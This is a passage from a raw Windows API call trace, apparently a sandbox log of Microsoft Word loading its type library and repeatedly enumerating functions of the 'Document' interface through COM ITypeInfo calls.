Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x145730, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLBºK²`~Oÿÿ", lpUsedDefaultChar=0x0) returned 58 [0071.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x145840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0071.842] ITypeLib:LocalReleaseTLibAttr (This=0x631b4c0) returned 0x0 [0071.842] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x69fd140 [0071.842] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0xafdc3b0 [0071.842] IUnknown:AddRef (This=0x695ca20) returned 0x4 [0071.842] IUnknown:Release (This=0x631b4c0) returned 0xd [0071.842] ITypeInfo:LocalReleaseTypeAttr (This=0x695ca20) returned 0x0 [0071.842] ITypeInfo:LocalReleaseTypeAttr (This=0x695ca20) returned 0x0 [0071.842] IUnknown:Release (This=0x695c8c0) returned 0x1 [0071.842] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x69fd590 [0071.842] IMalloc:Free (This=0x7fefec05380, pv=0x67c3d20) [0071.843] IUnknown:QueryInterface (in: This=0x695c8c0, riid=0x7fee3b240f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x147268 | out: ppvObject=0x147268*=0x695c8c0) returned 0x0 [0071.843] ITypeInfo2:GetCustData (in: This=0x695c8c0, GUID=0x7fee3b2d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x147278 | out: pVarVal=0x147278*(varType=0x0, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0071.843] IUnknown:Release (This=0x695c8c0) returned 0x2 [0071.843] ITypeInfo:RemoteGetDocumentation (in: This=0x695c8c0, memid=-1, refPtrFlags=0x147270, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x147290 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x147290*="") returned 0x0 [0071.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x147180, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0071.843] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0071.843] VirtualAlloc (lpAddress=0x3506000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3506000 [0071.844] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c970, ppTypeAttr=0x147270, pDummy=0x0 | out: ppTypeAttr=0x147270, pDummy=0x0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseTypeAttr (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x0, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.844] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.844] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x10, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x11, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x12, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x13, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x14, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x15, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x16, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x17, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x18, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x19, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1a, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1b, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1c, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1d, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1e, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.845] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.845] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1f, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x20, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x21, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x22, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x23, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x24, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x25, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x26, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x27, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x28, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x29, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2a, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2b, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2c, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2d, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2e, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2f, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.846] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x30, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.846] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x31, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x32, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x33, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x34, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x35, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x36, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x37, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x38, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x39, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3a, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3b, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3c, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3d, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3e, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3f, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x40, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x41, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.847] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.847] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x42, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x43, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x44, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x45, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x46, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x47, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x48, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x49, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4a, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4b, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4c, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4d, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4e, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4f, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x50, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x51, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x52, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.848] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.848] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x53, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x54, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x55, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x56, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x57, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x58, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x59, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5a, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, pDummy=0xf0) returned 0x0 [0071.849] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0071.849] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5b, ppFuncDesc=0x147248, pDummy=0xf0 | out: ppFuncDesc=0x147248, 